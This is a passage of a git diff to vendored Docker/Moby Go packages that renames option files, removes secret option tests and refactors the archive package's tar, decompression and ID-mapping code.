append(o.values, options) - return nil -} - -// Type returns the type of this option -func (o *SecretOpt) Type() string { - return "secret" -} - -// String returns a string repr of this option -func (o *SecretOpt) String() string { - secrets := []string{} - for _, secret := range o.values { - repr := fmt.Sprintf("%s -> %s", secret.Source, secret.Target) - secrets = append(secrets, repr) - } - return strings.Join(secrets, ", ") -} - -// Value returns the secret requests -func (o *SecretOpt) Value() []*types.SecretRequestOption { - return o.values -} diff --git a/vendor/github.com/docker/docker/opts/secret_test.go b/vendor/github.com/docker/docker/opts/secret_test.go deleted file mode 100644 index d978c86e22..0000000000 --- a/vendor/github.com/docker/docker/opts/secret_test.go +++ /dev/null @@ -1,79 +0,0 @@ -package opts - -import ( - "os" - "testing" - - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestSecretOptionsSimple(t *testing.T) { - var opt SecretOpt - - testCase := "app-secret" - assert.NilError(t, opt.Set(testCase)) - - reqs := opt.Value() - assert.Equal(t, len(reqs), 1) - req := reqs[0] - assert.Equal(t, req.Source, "app-secret") - assert.Equal(t, req.Target, "app-secret") - assert.Equal(t, req.UID, "0") - assert.Equal(t, req.GID, "0") -} - -func TestSecretOptionsSourceTarget(t *testing.T) { - var opt SecretOpt - - testCase := "source=foo,target=testing" - assert.NilError(t, opt.Set(testCase)) - - reqs := opt.Value() - assert.Equal(t, len(reqs), 1) - req := reqs[0] - assert.Equal(t, req.Source, "foo") - assert.Equal(t, req.Target, "testing") -} - -func TestSecretOptionsShorthand(t *testing.T) { - var opt SecretOpt - - testCase := "src=foo,target=testing" - assert.NilError(t, opt.Set(testCase)) - - reqs := opt.Value() - assert.Equal(t, len(reqs), 1) - req := reqs[0] - assert.Equal(t, req.Source, "foo") -} - -func TestSecretOptionsCustomUidGid(t *testing.T) { - var opt SecretOpt - - testCase := "source=foo,target=testing,uid=1000,gid=1001" - assert.NilError(t, opt.Set(testCase)) - - reqs := opt.Value() - assert.Equal(t, len(reqs), 1) - req := reqs[0] - assert.Equal(t, req.Source, "foo") - assert.Equal(t, req.Target, "testing") - assert.Equal(t, req.UID, "1000") - assert.Equal(t, req.GID, "1001") -} - -func TestSecretOptionsCustomMode(t *testing.T) { - var opt SecretOpt - - testCase := "source=foo,target=testing,uid=1000,gid=1001,mode=0444" - assert.NilError(t, opt.Set(testCase)) - - reqs := opt.Value() - assert.Equal(t, len(reqs), 1) - req := reqs[0] - assert.Equal(t, req.Source, "foo") - assert.Equal(t, req.Target, "testing") - assert.Equal(t, req.UID, "1000") - assert.Equal(t, req.GID, "1001") - assert.Equal(t, req.Mode, os.FileMode(0444)) -} diff --git a/vendor/github.com/docker/docker/runconfig/opts/ulimit.go b/vendor/github.com/docker/docker/opts/ulimit.go similarity index 65% rename from vendor/github.com/docker/docker/runconfig/opts/ulimit.go rename to vendor/github.com/docker/docker/opts/ulimit.go index 5adfe30851..0e2a36236c 100644 --- a/vendor/github.com/docker/docker/runconfig/opts/ulimit.go +++ b/vendor/github.com/docker/docker/opts/ulimit.go @@ -1,4 +1,4 @@ -package opts +package opts // import "github.com/docker/docker/opts" import ( "fmt" @@ -55,3 +55,27 @@ func (o *UlimitOpt) GetList() []*units.Ulimit { func (o *UlimitOpt) Type() string { return "ulimit" } + +// NamedUlimitOpt defines a named map of Ulimits +type NamedUlimitOpt struct { + name string + UlimitOpt +} + +var _ NamedOption = &NamedUlimitOpt{} + +// NewNamedUlimitOpt creates a new NamedUlimitOpt +func NewNamedUlimitOpt(name string, ref *map[string]*units.Ulimit) *NamedUlimitOpt { + if ref == nil { + ref = &map[string]*units.Ulimit{} + } + return &NamedUlimitOpt{ + name: name, + UlimitOpt: *NewUlimitOpt(ref), + } +} + +// Name returns the option name +func (o *NamedUlimitOpt) Name() string { + return o.name +} diff --git a/vendor/github.com/docker/docker/runconfig/opts/ulimit_test.go b/vendor/github.com/docker/docker/opts/ulimit_test.go similarity index 94% rename from vendor/github.com/docker/docker/runconfig/opts/ulimit_test.go rename to vendor/github.com/docker/docker/opts/ulimit_test.go index 0aa3facdfb..41e12627c8 100644 --- a/vendor/github.com/docker/docker/runconfig/opts/ulimit_test.go +++ b/vendor/github.com/docker/docker/opts/ulimit_test.go @@ -1,4 +1,4 @@ -package opts +package opts // import "github.com/docker/docker/opts" import ( "testing" diff --git a/vendor/github.com/docker/docker/pkg/README.md b/vendor/github.com/docker/docker/pkg/README.md index c4b78a8ad8..755cd96836 100644 --- a/vendor/github.com/docker/docker/pkg/README.md +++ b/vendor/github.com/docker/docker/pkg/README.md @@ -1,8 +1,8 @@ -pkg/ is a collection of utility packages used by the Docker project without being specific to its internals. +pkg/ is a collection of utility packages used by the Moby project without being specific to its internals. -Utility packages are kept separate from the docker core codebase to keep it as small and concise as possible. +Utility packages are kept separate from the moby core codebase to keep it as small and concise as possible. If some utilities grow larger and their APIs stabilize, they may be moved to their own repository under the -Docker organization, to facilitate re-use by other projects. However that is not the priority. +Moby organization, to facilitate re-use by other projects. However that is not the priority. The directory `pkg` is named after the same directory in the camlistore project. Since Brad is a core Go maintainer, we thought it made sense to copy his methods for organizing Go code :) Thanks Brad! diff --git a/vendor/github.com/docker/docker/pkg/aaparser/aaparser.go b/vendor/github.com/docker/docker/pkg/aaparser/aaparser.go index ffcc5647a9..9c12e8db8d 100644 --- a/vendor/github.com/docker/docker/pkg/aaparser/aaparser.go +++ b/vendor/github.com/docker/docker/pkg/aaparser/aaparser.go @@ -1,5 +1,5 @@ // Package aaparser is a convenience package interacting with `apparmor_parser`. -package aaparser +package aaparser // import "github.com/docker/docker/pkg/aaparser" import ( "fmt" @@ -22,14 +22,12 @@ func GetVersion() (int, error) { return parseVersion(output) } -// LoadProfile runs `apparmor_parser -r` on a specified apparmor profile to -// replace the profile. +// LoadProfile runs `apparmor_parser -Kr` on a specified apparmor profile to +// replace the profile. The `-K` is necessary to make sure that apparmor_parser +// doesn't try to write to a read-only filesystem. func LoadProfile(profilePath string) error { - _, err := cmd("", "-r", profilePath) - if err != nil { - return err - } - return nil + _, err := cmd("", "-Kr", profilePath) + return err } // cmd runs `apparmor_parser` with the passed arguments. @@ -39,7 +37,7 @@ func cmd(dir string, arg ...string) (string, error) { output, err := c.CombinedOutput() if err != nil { - return "", fmt.Errorf("running `%s %s` failed with output: %s\nerror: %v", c.Path, strings.Join(c.Args, " "), string(output), err) + return "", fmt.Errorf("running `%s %s` failed with output: %s\nerror: %v", c.Path, strings.Join(c.Args, " "), output, err) } return string(output), nil diff --git a/vendor/github.com/docker/docker/pkg/aaparser/aaparser_test.go b/vendor/github.com/docker/docker/pkg/aaparser/aaparser_test.go index 69bc8d2fd8..6d1f737702 100644 --- a/vendor/github.com/docker/docker/pkg/aaparser/aaparser_test.go +++ b/vendor/github.com/docker/docker/pkg/aaparser/aaparser_test.go @@ -1,4 +1,4 @@ -package aaparser +package aaparser // import "github.com/docker/docker/pkg/aaparser" import ( "testing" diff --git a/vendor/github.com/docker/docker/pkg/archive/archive.go b/vendor/github.com/docker/docker/pkg/archive/archive.go index 3261c4f498..daddebded4 100644 --- a/vendor/github.com/docker/docker/pkg/archive/archive.go +++ b/vendor/github.com/docker/docker/pkg/archive/archive.go @@ -1,4 +1,4 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "archive/tar" @@ -6,7 +6,7 @@ import ( "bytes" "compress/bzip2" "compress/gzip" - "errors" + "context" "fmt" "io" "io/ioutil" @@ -14,27 +14,35 @@ import ( "os/exec" "path/filepath" "runtime" + "strconv" "strings" "syscall" + "time" - "github.com/Sirupsen/logrus" "github.com/docker/docker/pkg/fileutils" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/ioutils" "github.com/docker/docker/pkg/pools" - "github.com/docker/docker/pkg/promise" "github.com/docker/docker/pkg/system" + "github.com/sirupsen/logrus" ) +var unpigzPath string + +func init() { + if path, err := exec.LookPath("unpigz"); err != nil { + logrus.Debug("unpigz binary not found in PATH, falling back to go gzip library") + } else { + logrus.Debugf("Using unpigz binary found at path %s", path) + unpigzPath = path + } +} + type ( // Compression is the state represents if compressed or not. Compression int // WhiteoutFormat is the format of whiteouts unpacked WhiteoutFormat int - // TarChownOptions wraps the chown options UID and GID. - TarChownOptions struct { - UID, GID int - } // TarOptions wraps the tar options. TarOptions struct { @@ -44,7 +52,7 @@ type ( NoLchown bool UIDMaps []idtools.IDMap GIDMaps []idtools.IDMap - ChownOpts *TarChownOptions + ChownOpts *idtools.IDPair IncludeSourceDir bool // WhiteoutFormat is the expected on disk format for whiteout files. // This format will be converted to the standard format on pack @@ -58,33 +66,25 @@ type ( RebaseNames map[string]string InUserNS bool } - - // Archiver allows the reuse of most utility functions of this package - // with a pluggable Untar function. Also, to facilitate the passing of - // specific id mappings for untar, an archiver can be created with maps - // which will then be passed to Untar operations - Archiver struct { - Untar func(io.Reader, string, *TarOptions) error - UIDMaps []idtools.IDMap - GIDMaps []idtools.IDMap - } - - // breakoutError is used to differentiate errors related to breaking out - // When testing archive breakout in the unit tests, this error is expected - // in order for the test to pass. - breakoutError error ) -var ( - // ErrNotImplemented is the error message of function not implemented. - ErrNotImplemented = errors.New("Function not implemented") - defaultArchiver = &Archiver{Untar: Untar, UIDMaps: nil, GIDMaps: nil} -) +// Archiver implements the Archiver interface and allows the reuse of most utility functions of +// this package with a pluggable Untar function. Also, to facilitate the passing of specific id +// mappings for untar, an Archiver can be created with maps which will then be passed to Untar operations. +type Archiver struct { + Untar func(io.Reader, string, *TarOptions) error + IDMappingsVar *idtools.IDMappings +} -const ( - // HeaderSize is the size in bytes of a tar header - HeaderSize = 512 -) +// NewDefaultArchiver returns a new Archiver without any IDMappings +func NewDefaultArchiver() *Archiver { + return &Archiver{Untar: Untar, IDMappingsVar: &idtools.IDMappings{}} +} + +// breakoutError is used to differentiate errors related to breaking out +// When testing archive breakout in the unit tests, this error is expected +// in order for the test to pass. +type breakoutError error const ( // Uncompressed represents the uncompressed. @@ -105,17 +105,15 @@ const ( OverlayWhiteoutFormat ) -// IsArchive checks for the magic bytes of a tar or any supported compression -// algorithm. -func IsArchive(header []byte) bool { - compression := DetectCompression(header) - if compression != Uncompressed { - return true - } - r := tar.NewReader(bytes.NewBuffer(header)) - _, err := r.Next() - return err == nil -} +const ( + modeISDIR = 040000 // Directory + modeISFIFO = 010000 // FIFO + modeISREG = 0100000 // Regular file + modeISLNK = 0120000 // Symbolic link + modeISBLK = 060000 // Block special file + modeISCHR = 020000 // Character special file + modeISSOCK = 0140000 // Socket +) // IsArchivePath checks if the (possibly compressed) file at the given path // starts with a tar file header. @@ -129,6 +127,7 @@ func IsArchivePath(path string) bool { if err != nil { return false } + defer rdr.Close() r := tar.NewReader(rdr) _, err = r.Next() return err == nil @@ -145,17 +144,41 @@ func DetectCompression(source []byte) Compression { logrus.Debug("Len too short") continue } - if bytes.Compare(m, source[:len(m)]) == 0 { + if bytes.Equal(m, source[:len(m)]) { return compression } } return Uncompressed } -func xzDecompress(archive io.Reader) (io.ReadCloser, <-chan struct{}, error) { +func xzDecompress(ctx context.Context, archive io.Reader) (io.ReadCloser, error) { args := []string{"xz", "-d", "-c", "-q"} - return cmdStream(exec.Command(args[0], args[1:]...), archive) + return cmdStream(exec.CommandContext(ctx, args[0], args[1:]...), archive) +} + +func gzDecompress(ctx context.Context, buf io.Reader) (io.ReadCloser, error) { + if unpigzPath == "" { + return gzip.NewReader(buf) + } + + disablePigzEnv := os.Getenv("MOBY_DISABLE_PIGZ") + if disablePigzEnv != "" { + if disablePigz, err := strconv.ParseBool(disablePigzEnv); err != nil { + return nil, err + } else if disablePigz { + return gzip.NewReader(buf) + } + } + + return cmdStream(exec.CommandContext(ctx, unpigzPath, "-d", "-c"), buf) +} + +func wrapReadCloser(readBuf io.ReadCloser, cancel context.CancelFunc) io.ReadCloser { + return ioutils.NewReadCloserWrapper(readBuf, func() error { + cancel() + return readBuf.Close() + }) } // DecompressStream decompresses the archive and returns a ReaderCloser with the decompressed archive. @@ -179,32 +202,35 @@ func DecompressStream(archive io.Reader) (io.ReadCloser, error) { readBufWrapper := p.NewReadCloserWrapper(buf, buf) return readBufWrapper, nil case Gzip: - gzReader, err := gzip.NewReader(buf) + ctx, cancel := context.WithCancel(context.Background()) + + gzReader, err := gzDecompress(ctx, buf) if err != nil { + cancel() return nil, err } readBufWrapper := p.NewReadCloserWrapper(buf, gzReader) - return readBufWrapper, nil + return wrapReadCloser(readBufWrapper, cancel), nil case Bzip2: bz2Reader := bzip2.NewReader(buf) readBufWrapper := p.NewReadCloserWrapper(buf, bz2Reader) return readBufWrapper, nil case Xz: - xzReader, chdone, err := xzDecompress(buf) + ctx, cancel := context.WithCancel(context.Background()) + + xzReader, err := xzDecompress(ctx, buf) if err != nil { + cancel() return nil, err } readBufWrapper := p.NewReadCloserWrapper(buf, xzReader) - return ioutils.NewReadCloserWrapper(readBufWrapper, func() error { - <-chdone - return readBufWrapper.Close() - }), nil + return wrapReadCloser(readBufWrapper, cancel), nil default: return nil, fmt.Errorf("Unsupported compression format %s", (&compression).Extension()) } } -// CompressStream compresseses the dest with specified compression algorithm. +// CompressStream compresses the dest with specified compression algorithm. func CompressStream(dest io.Writer, compression Compression) (io.WriteCloser, error) { p := pools.BufioWriter32KPool buf := p.Get(dest) @@ -225,6 +251,93 @@ func CompressStream(dest io.Writer, compression Compression) (io.WriteCloser, er } } +// TarModifierFunc is a function that can be passed to ReplaceFileTarWrapper to +// modify the contents or header of an entry in the archive. If the file already +// exists in the archive the TarModifierFunc will be called with the Header and +// a reader which will return the files content. If the file does not exist both +// header and content will be nil. +type TarModifierFunc func(path string, header *tar.Header, content io.Reader) (*tar.Header, []byte, error) + +// ReplaceFileTarWrapper converts inputTarStream to a new tar stream. Files in the +// tar stream are modified if they match any of the keys in mods. +func ReplaceFileTarWrapper(inputTarStream io.ReadCloser, mods map[string]TarModifierFunc) io.ReadCloser { + pipeReader, pipeWriter := io.Pipe() + + go func() { + tarReader := tar.NewReader(inputTarStream) + tarWriter := tar.NewWriter(pipeWriter) + defer inputTarStream.Close() + defer tarWriter.Close() + + modify := func(name string, original *tar.Header, modifier TarModifierFunc, tarReader io.Reader) error { + header, data, err := modifier(name, original, tarReader) + switch { + case err != nil: + return err + case header == nil: + return nil + } + + header.Name = name + header.Size = int64(len(data)) + if err := tarWriter.WriteHeader(header); err != nil { + return err + } + if len(data) != 0 { + if _, err := tarWriter.Write(data); err != nil { + return err + } + } + return nil + } + + var err error + var originalHeader *tar.Header + for { + originalHeader, err = tarReader.Next() + if err == io.EOF { + break + } + if err != nil { + pipeWriter.CloseWithError(err) + return + } + + modifier, ok := mods[originalHeader.Name] + if !ok { + // No modifiers for this file, copy the header and data + if err := tarWriter.WriteHeader(originalHeader); err != nil { + pipeWriter.CloseWithError(err) + return + } + if _, err := pools.Copy(tarWriter, tarReader); err != nil { + pipeWriter.CloseWithError(err) + return + } + continue + } + delete(mods, originalHeader.Name) + + if err := modify(originalHeader.Name, originalHeader, modifier, tarReader); err != nil { + pipeWriter.CloseWithError(err) + return + } + } + + // Apply the modifiers that haven't matched any files in the archive + for name, modifier := range mods { + if err := modify(name, nil, modifier, nil); err != nil { + pipeWriter.CloseWithError(err) + return + } + } + + pipeWriter.Close() + + }() + return pipeReader +} + // Extension returns the extension of a file that uses the specified compression algorithm. func (compression *Compression) Extension() string { switch *compression { @@ -240,6 +353,67 @@ func (compression *Compression) Extension() string { return "" } +// FileInfoHeader creates a populated Header from fi. +// Compared to archive pkg this function fills in more information. +// Also, regardless of Go version, this function fills file type bits (e.g. hdr.Mode |= modeISDIR), +// which have been deleted since Go 1.9 archive/tar. +func FileInfoHeader(name string, fi os.FileInfo, link string) (*tar.Header, error) { + hdr, err := tar.FileInfoHeader(fi, link) + if err != nil { + return nil, err + } + hdr.Format = tar.FormatPAX + hdr.ModTime = hdr.ModTime.Truncate(time.Second) + hdr.AccessTime = time.Time{} + hdr.ChangeTime = time.Time{} + hdr.Mode = fillGo18FileTypeBits(int64(chmodTarEntry(os.FileMode(hdr.Mode))), fi) + name, err = canonicalTarName(name, fi.IsDir()) + if err != nil { + return nil, fmt.Errorf("tar: cannot canonicalize path: %v", err) + } + hdr.Name = name + if err := setHeaderForSpecialDevice(hdr, name, fi.Sys()); err != nil { + return nil, err + } + return hdr, nil +} + +// fillGo18FileTypeBits fills type bits which have been removed on Go 1.9 archive/tar +// https://github.com/golang/go/commit/66b5a2f +func fillGo18FileTypeBits(mode int64, fi os.FileInfo) int64 { + fm := fi.Mode() + switch { + case fm.IsRegular(): + mode |= modeISREG + case fi.IsDir(): + mode |= modeISDIR + case fm&os.ModeSymlink != 0: + mode |= modeISLNK + case fm&os.ModeDevice != 0: + if fm&os.ModeCharDevice != 0 { + mode |= modeISCHR + } else { + mode |= modeISBLK + } + case fm&os.ModeNamedPipe != 0: + mode |= modeISFIFO + case fm&os.ModeSocket != 0: + mode |= modeISSOCK + } + return mode +} + +// ReadSecurityXattrToTarHeader reads security.capability xattr from filesystem +// to a tar header +func ReadSecurityXattrToTarHeader(path string, hdr *tar.Header) error { + capability, _ := system.Lgetxattr(path, "security.capability") + if capability != nil { + hdr.Xattrs = make(map[string]string) + hdr.Xattrs["security.capability"] = string(capability) + } + return nil +} + type tarWhiteoutConverter interface { ConvertWrite(*tar.Header, string, os.FileInfo) (*tar.Header, error) ConvertRead(*tar.Header, string) (bool, error) @@ -250,9 +424,9 @@ type tarAppender struct { Buffer *bufio.Writer // for hardlink mapping - SeenFiles map[uint64]string - UIDMaps []idtools.IDMap - GIDMaps []idtools.IDMap + SeenFiles map[uint64]string + IDMappings *idtools.IDMappings + ChownOpts *idtools.IDPair // For packing and unpacking whiteout files in the // non standard format. The whiteout files defined @@ -261,6 +435,16 @@ type tarAppender struct { WhiteoutConverter tarWhiteoutConverter } +func newTarAppender(idMapping *idtools.IDMappings, writer io.Writer, chownOpts *idtools.IDPair) *tarAppender { + return &tarAppender{ + SeenFiles: make(map[uint64]string), + TarWriter: tar.NewWriter(writer), + Buffer: pools.BufioWriter32KPool.Get(nil), + IDMappings: idMapping, + ChownOpts: chownOpts, + } +} + // canonicalTarName provides a platform-independent and consistent posix-style //path for files and directories to be archived regardless of the platform. func canonicalTarName(name string, isDir bool) (string, error) { @@ -283,33 +467,30 @@ func (ta *tarAppender) addTarFile(path, name string) error { return err } - link := "" + var link string if fi.Mode()&os.ModeSymlink != 0 { - if link, err = os.Readlink(path); err != nil { + var err error + link, err = os.Readlink(path) + if err != nil { return err } } - hdr, err := tar.FileInfoHeader(fi, link) + hdr, err := FileInfoHeader(name, fi, link) if err != nil { return err } - hdr.Mode = int64(chmodTarEntry(os.FileMode(hdr.Mode))) - - name, err = canonicalTarName(name, fi.IsDir()) - if err != nil { - return fmt.Errorf("tar: cannot canonicalize path: %v", err) - } - hdr.Name = name - - inode, err := setHeaderForSpecialDevice(hdr, ta, name, fi.Sys()) - if err != nil { + if err := ReadSecurityXattrToTarHeader(path, hdr); err != nil { return err } // if it's not a directory and has more than 1 link, // it's hard linked, so set the type flag accordingly if !fi.IsDir() && hasHardlinks(fi) { + inode, err := getInodeFromStat(fi.Sys()) + if err != nil { + return err + } // a link should have a name that it links too // and that linked name should be first in the tar archive if oldpath, ok := ta.SeenFiles[inode]; ok { @@ -321,30 +502,30 @@ func (ta *tarAppender) addTarFile(path, name string) error { } } - capability, _ := system.Lgetxattr(path, "security.capability") - if capability != nil { - hdr.Xattrs = make(map[string]string) - hdr.Xattrs["security.capability"] = string(capability) - } + //check whether the file is overlayfs whiteout + //if yes, skip re-mapping container ID mappings. + isOverlayWhiteout := fi.Mode()&os.ModeCharDevice != 0 && hdr.Devmajor == 0 && hdr.Devminor == 0 //handle re-mapping container ID mappings back to host ID mappings before //writing tar headers/files. We skip whiteout files because they were written //by the kernel and already have proper ownership relative to the host - if !strings.HasPrefix(filepath.Base(hdr.Name), WhiteoutPrefix) && (ta.UIDMaps != nil || ta.GIDMaps != nil) { - uid, gid, err := getFileUIDGID(fi.Sys()) - if err != nil { - return err - } - xUID, err := idtools.ToContainer(uid, ta.UIDMaps) + if !isOverlayWhiteout && + !strings.HasPrefix(filepath.Base(hdr.Name), WhiteoutPrefix) && + !ta.IDMappings.Empty() { + fileIDPair, err := getFileUIDGID(fi.Sys()) if err != nil { return err } - xGID, err := idtools.ToContainer(gid, ta.GIDMaps) + hdr.Uid, hdr.Gid, err = ta.IDMappings.ToContainer(fileIDPair) if err != nil { return err } - hdr.Uid = xUID - hdr.Gid = xGID + } + + // explicitly override with ChownOpts + if ta.ChownOpts != nil { + hdr.Uid = ta.ChownOpts.UID + hdr.Gid = ta.ChownOpts.GID } if ta.WhiteoutConverter != nil { @@ -398,7 +579,7 @@ func (ta *tarAppender) addTarFile(path, name string) error { return nil } -func createTarFile(path, extractDir string, hdr *tar.Header, reader io.Reader, Lchown bool, chownOpts *TarChownOptions, inUserns bool) error { +func createTarFile(path, extractDir string, hdr *tar.Header, reader io.Reader, Lchown bool, chownOpts *idtools.IDPair, inUserns bool) error { // hdr.Mode is in linux format, which we can use for sycalls, // but for os.Foo() calls we need the mode converted to os.FileMode, // so use hdrInfo.Mode() (they differ for e.g. setuid bits) @@ -472,13 +653,13 @@ func createTarFile(path, extractDir string, hdr *tar.Header, reader io.Reader, L return nil default: - return fmt.Errorf("Unhandled tar header type %d\n", hdr.Typeflag) + return fmt.Errorf("unhandled tar header type %d", hdr.Typeflag) } // Lchown is not supported on Windows. if Lchown && runtime.GOOS != "windows" { if chownOpts == nil { - chownOpts = &TarChownOptions{UID: hdr.Uid, GID: hdr.Gid} + chownOpts = &idtools.IDPair{UID: hdr.Uid, GID: hdr.Gid} } if err := os.Lchown(path, chownOpts.UID, chownOpts.GID); err != nil { return err @@ -553,8 +734,7 @@ func TarWithOptions(srcPath string, options *TarOptions) (io.ReadCloser, error) // on platforms other than Windows. srcPath = fixVolumePathPrefix(srcPath) - patterns, patDirs, exceptions, err := fileutils.CleanPatterns(options.ExcludePatterns) - + pm, err := fileutils.NewPatternMatcher(options.ExcludePatterns) if err != nil { return nil, err } @@ -567,14 +747,12 @@ func TarWithOptions(srcPath string, options *TarOptions) (io.ReadCloser, error) } go func() { - ta := &tarAppender{ - TarWriter: tar.NewWriter(compressWriter), - Buffer: pools.BufioWriter32KPool.Get(nil), - SeenFiles: make(map[uint64]string), - UIDMaps: options.UIDMaps, - GIDMaps: options.GIDMaps, - WhiteoutConverter: getWhiteoutConverter(options.WhiteoutFormat), - } + ta := newTarAppender( + idtools.NewIDMappingsFromMaps(options.UIDMaps, options.GIDMaps), + compressWriter, + options.ChownOpts, + ) + ta.WhiteoutConverter = getWhiteoutConverter(options.WhiteoutFormat) defer func() { // Make sure to check the error on Close. @@ -651,7 +829,7 @@ func TarWithOptions(srcPath string, options *TarOptions) (io.ReadCloser, error) // is asking for that file no matter what - which is true // for some files, like .dockerignore and Dockerfile (sometimes) if include != relFilePath { - skip, err = fileutils.OptimizedMatches(relFilePath, patterns, patDirs) + skip, err = pm.Matches(relFilePath) if err != nil { logrus.Errorf("Error matching %s: %v", relFilePath, err) return err @@ -661,7 +839,7 @@ func TarWithOptions(srcPath string, options *TarOptions) (io.ReadCloser, error) if skip { // If we want to skip this file and its a directory // then we should first check to see if there's an - // excludes pattern (eg !dir/file) that starts with this + // excludes pattern (e.g. !dir/file) that starts with this // dir. If so then we can't skip this dir. // Its not a dir then so we can just return/skip. @@ -670,18 +848,17 @@ func TarWithOptions(srcPath string, options *TarOptions) (io.ReadCloser, error) } // No exceptions (!...) in patterns so just skip dir - if !exceptions { + if !pm.Exclusions() { return filepath.SkipDir } dirSlash := relFilePath + string(filepath.Separator) - for _, pat := range patterns { - if pat[0] != '!' { + for _, pat := range pm.Patterns() { + if !pat.Exclusion() { continue } - pat = pat[1:] + string(filepath.Separator) - if strings.HasPrefix(pat, dirSlash) { + if strings.HasPrefix(pat.String()+string(filepath.Separator), dirSlash) { // found a match - so can't skip this dir return nil } @@ -731,10 +908,8 @@ func Unpack(decompressedArchive io.Reader, dest string, options *TarOptions) err defer pools.BufioReader32KPool.Put(trBuf) var dirs []*tar.Header - remappedRootUID, remappedRootGID, err := idtools.GetRootUIDGID(options.UIDMaps, options.GIDMaps) - if err != nil { - return err - } + idMappings := idtools.NewIDMappingsFromMaps(options.UIDMaps, options.GIDMaps) + rootIDs := idMappings.RootPair() whiteoutConverter := getWhiteoutConverter(options.WhiteoutFormat) // Iterate through the files in the archive. @@ -768,7 +943,7 @@ loop: parent := filepath.Dir(hdr.Name) parentPath := filepath.Join(dest, parent) if _, err := os.Lstat(parentPath); err != nil && os.IsNotExist(err) { - err = idtools.MkdirAllNewAs(parentPath, 0777, remappedRootUID, remappedRootGID) + err = idtools.MkdirAllAndChownNew(parentPath, 0777, rootIDs) if err != nil { return err } @@ -813,26 +988,8 @@ loop: } trBuf.Reset(tr) - // if the options contain a uid & gid maps, convert header uid/gid - // entries using the maps such that lchown sets the proper mapped - // uid/gid after writing the file. We only perform this mapping if - // the file isn't already owned by the remapped root UID or GID, as - // that specific uid/gid has no mapping from container -> host, and - // those files already have the proper ownership for inside the - // container. - if hdr.Uid != remappedRootUID { - xUID, err := idtools.ToHost(hdr.Uid, options.UIDMaps) - if err != nil { - return err - } - hdr.Uid = xUID - } - if hdr.Gid != remappedRootGID { - xGID, err := idtools.ToHost(hdr.Gid, options.GIDMaps) - if err != nil { - return err - } - hdr.Gid = xGID + if err := remapIDs(idMappings, hdr); err != nil { + return err } if whiteoutConverter != nil { @@ -917,23 +1074,13 @@ func (archiver *Archiver) TarUntar(src, dst string) error { return err } defer archive.Close() - - var options *TarOptions - if archiver.UIDMaps != nil || archiver.GIDMaps != nil { - options = &TarOptions{ - UIDMaps: archiver.UIDMaps, - GIDMaps: archiver.GIDMaps, - } + options := &TarOptions{ + UIDMaps: archiver.IDMappingsVar.UIDs(), + GIDMaps: archiver.IDMappingsVar.GIDs(), } return archiver.Untar(archive, dst, options) } -// TarUntar is a convenience function which calls Tar and Untar, with the output of one piped into the other. -// If either Tar or Untar fails, TarUntar aborts and returns the error. -func TarUntar(src, dst string) error { - return defaultArchiver.TarUntar(src, dst) -} - // UntarPath untar a file from path to a destination, src is the source tar file path. func (archiver *Archiver) UntarPath(src, dst string) error { archive, err := os.Open(src) @@ -941,22 +1088,13 @@ func (archiver *Archiver) UntarPath(src, dst string) error { return err } defer archive.Close() - var options *TarOptions - if archiver.UIDMaps != nil || archiver.GIDMaps != nil { - options = &TarOptions{ - UIDMaps: archiver.UIDMaps, - GIDMaps: archiver.GIDMaps, - } + options := &TarOptions{ + UIDMaps: archiver.IDMappingsVar.UIDs(), + GIDMaps: archiver.IDMappingsVar.GIDs(), } return archiver.Untar(archive, dst, options) } -// UntarPath is a convenience function which looks for an archive -// at filesystem path `src`, and unpacks it at `dst`. -func UntarPath(src, dst string) error { - return defaultArchiver.UntarPath(src, dst) -} - // CopyWithTar creates a tar archive of filesystem path `src`, and // unpacks it at filesystem path `dst`. // The archive is streamed directly with fixed buffering and no @@ -970,30 +1108,19 @@ func (archiver *Archiver) CopyWithTar(src, dst string) error { return archiver.CopyFileWithTar(src, dst) } - // if this archiver is set up with ID mapping we need to create + // if this Archiver is set up with ID mapping we need to create // the new destination directory with the remapped root UID/GID pair // as owner - rootUID, rootGID, err := idtools.GetRootUIDGID(archiver.UIDMaps, archiver.GIDMaps) - if err != nil { - return err - } + rootIDs := archiver.IDMappingsVar.RootPair() // Create dst, copy src's content into it logrus.Debugf("Creating dest directory: %s", dst) - if err := idtools.MkdirAllNewAs(dst, 0755, rootUID, rootGID); err != nil { + if err := idtools.MkdirAllAndChownNew(dst, 0755, rootIDs); err != nil { return err } logrus.Debugf("Calling TarUntar(%s, %s)", src, dst) return archiver.TarUntar(src, dst) } -// CopyWithTar creates a tar archive of filesystem path `src`, and -// unpacks it at filesystem path `dst`. -// The archive is streamed directly with fixed buffering and no -// intermediary disk IO. -func CopyWithTar(src, dst string) error { - return defaultArchiver.CopyWithTar(src, dst) -} - // CopyFileWithTar emulates the behavior of the 'cp' command-line // for a single file. It copies a regular file from path `src` to // path `dst`, and preserves all its metadata. @@ -1014,59 +1141,51 @@ func (archiver *Archiver) CopyFileWithTar(src, dst string) (err error) { dst = filepath.Join(dst, filepath.Base(src)) } // Create the holding directory if necessary - if err := system.MkdirAll(filepath.Dir(dst), 0700); err != nil { + if err := system.MkdirAll(filepath.Dir(dst), 0700, ""); err != nil { return err } r, w := io.Pipe() - errC := promise.Go(func() error { - defer w.Close() + errC := make(chan error, 1) - srcF, err := os.Open(src) - if err != nil { - return err - } - defer srcF.Close() + go func() { + defer close(errC) - hdr, err := tar.FileInfoHeader(srcSt, "") - if err != nil { - return err - } - hdr.Name = filepath.Base(dst) - hdr.Mode = int64(chmodTarEntry(os.FileMode(hdr.Mode))) + errC <- func() error { + defer w.Close() - remappedRootUID, remappedRootGID, err := idtools.GetRootUIDGID(archiver.UIDMaps, archiver.GIDMaps) - if err != nil { - return err - } - - // only perform mapping if the file being copied isn't already owned by the - // uid or gid of the remapped root in the container - if remappedRootUID != hdr.Uid { - xUID, err := idtools.ToHost(hdr.Uid, archiver.UIDMaps) + srcF, err := os.Open(src) if err != nil { return err } - hdr.Uid = xUID - } - if remappedRootGID != hdr.Gid { - xGID, err := idtools.ToHost(hdr.Gid, archiver.GIDMaps) + defer srcF.Close() + + hdr, err := tar.FileInfoHeader(srcSt, "") if err != nil { return err } - hdr.Gid = xGID - } + hdr.Format = tar.FormatPAX + hdr.ModTime = hdr.ModTime.Truncate(time.Second) + hdr.AccessTime = time.Time{} + hdr.ChangeTime = time.Time{} + hdr.Name = filepath.Base(dst) + hdr.Mode = 